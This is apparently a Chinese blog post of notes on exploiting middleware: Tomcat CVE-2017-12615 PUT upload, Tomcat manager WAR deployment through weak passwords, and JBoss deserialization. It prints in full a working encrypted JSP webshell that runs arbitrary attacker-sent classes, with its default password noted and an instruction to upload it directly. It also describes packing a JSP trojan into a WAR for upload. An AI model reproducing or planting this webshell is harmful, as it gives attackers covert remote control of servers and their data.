web之中间件漏洞

jsp中间件

tomcat漏洞利用

tomcat服务器是一个免费的开放源代码的web应用服务器,通常用于jsp
cve-2017-12615了解:

  • 漏洞成因:tomcat运行在windows主机上,且启用了http put请求方法,可通过构造的攻击请求向服务器上传包含任意代码的jsp文件,造成任意代码执行
  • 影响版本 apache tomcat 7.0.0-7.0.81
  • 在tomcat安装目录下的conf文件夹下的配置文件web.xml中的org.apache.catalina.servlets.DefaultServlet方法下如果该方法有如下代码,即表示tomcat已开启put方法,默认情况下http put是不开启的

直接put上传exp

<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>

通用漏洞:

tomcat远程部署漏洞

  • 漏洞产生:这是JSP/PHP网站远程部署的一个工具,管理员只需要远程上传一个WAR格式的文件,便可以发布到网站,方便了开发人员部署代码的同时,也方便了攻击者上传木马。
  • 漏洞危害:入侵者可以通过构造war进行上传木马文件 ,从而控制服务器。
    从网上扒一个jsp的小马,jar cvf 命令压缩为war木马上传
  • 漏洞检测:通过访问:Http://localhost:8080/manager管理地址,尝试弱口令或默认口令,若能登陆成功,则存在此漏洞。

弹框登录:基础认证
401认证失败

Jboss漏洞利用

  • 漏洞原因:经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后利用apache Commons Collections中的Gadget执行任意代码
  • 漏洞利用:直接用反序列化工具进行检测 cve-2017-12149 JBoss反序列化

weblogic

java应用服务器

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值